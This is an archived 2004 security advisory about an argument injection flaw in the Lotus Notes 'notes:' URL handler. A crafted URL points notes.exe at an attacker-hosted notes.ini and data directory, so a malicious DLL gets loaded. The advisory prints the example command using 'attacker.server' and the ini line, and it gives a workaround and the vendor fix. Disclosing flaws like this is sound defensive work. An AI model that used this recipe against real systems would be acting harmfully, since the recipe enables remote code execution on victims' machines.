what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

lotus.inject.txt

lotus.inject.txt
Posted Jun 27, 2004
Authored by Jouko Pynnonen | Site klikki.fi

During the client-side Windows installation of Lotus Notes, a notes: URL handler is registered in the registry. An argument injection attack allows an intruder to pass command line arguments to notes.exe, which can lead to execution of arbitrary code.

tags | advisory, arbitrary, registry
systems | windows
SHA-256 | 7f1d5d7fa6e4854573d335dc29ba01617e06478c0fbeabab00dc2a8338959037

lotus.inject.txt

Change Mirror Download


OVERVIEW
========

Lotus Notes is a groupware/e-mail system developed by Lotus Software.
Due to its security and collaboration features it's used particularly
by large organizations, government agencies, etc. IBM estimates it is
used by 60 million people.

During the client-side Windows installation of Lotus Notes, a "notes:"
URL handler is registered in the registry. An argument injection
attack allows an intruder to pass command line arguments to notes.exe,
which can lead to execution of arbitrary code.



DETAILS
=======

The installed registry entry causes any "notes:" URL to be opened with
notes.exe and the URL passed as the argument. If the URL contains space
characters, notes.exe takes the characters after that as a second
command line argument. Any web page can cause notes.exe be started in
this way by refering to a notes: URL.

Location of Notes configuration file, notes.ini, can be specified on
the command line by prefixing it with an equals sign (=). The notes.ini
file can be located on a network share. An attacker can use the URL to
specify an arbitrary notes.ini file located on a public network share,
so that the command run when opening the URL would be e.g.

notes.exe =\\attacker.server\notes\notes.ini

The notes.ini file contains locations for Notes data directory, which
in this case can be also located on a public network share. The
notes.ini file could contain e.g.

[Notes]
Directory=\\attacker.server\\notes

The program uses this directory to load some dynamic libraries.
The attacker can place arbitrary code in the init section of such DLL
and cause it to be run during notes.exe startup. The scenario was
successfully tested with an exploit. On opening the malicious web
page, the victim system downloaded the DLL and ran the code in it.

The exploit requires that notes.exe isn't already running while the
victim views the malicious web page or e-mail message, because DLL's
are only loaded on program startup. It also requires that outgoing
connections to Internet shares aren't blocked by firewalls or registry
settings.



SOLUTION
========

IBM was contacted on March 17, 2004. The fix SPR# KSPR5X6VEA has now
been released to solve the issue. As a workaround, the registry key

HKEY_CLASSES_ROOT\Notes\Shell\Open\Command

can be removed.



CREDITS
=======

The vulnerability was discovered and researched by Jouko Pynnönen,
Finland.




--
Jouko Pynnönen Web: http://iki.fi/jouko/
jouko@iki.fi GSM: +358 41 5504555
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close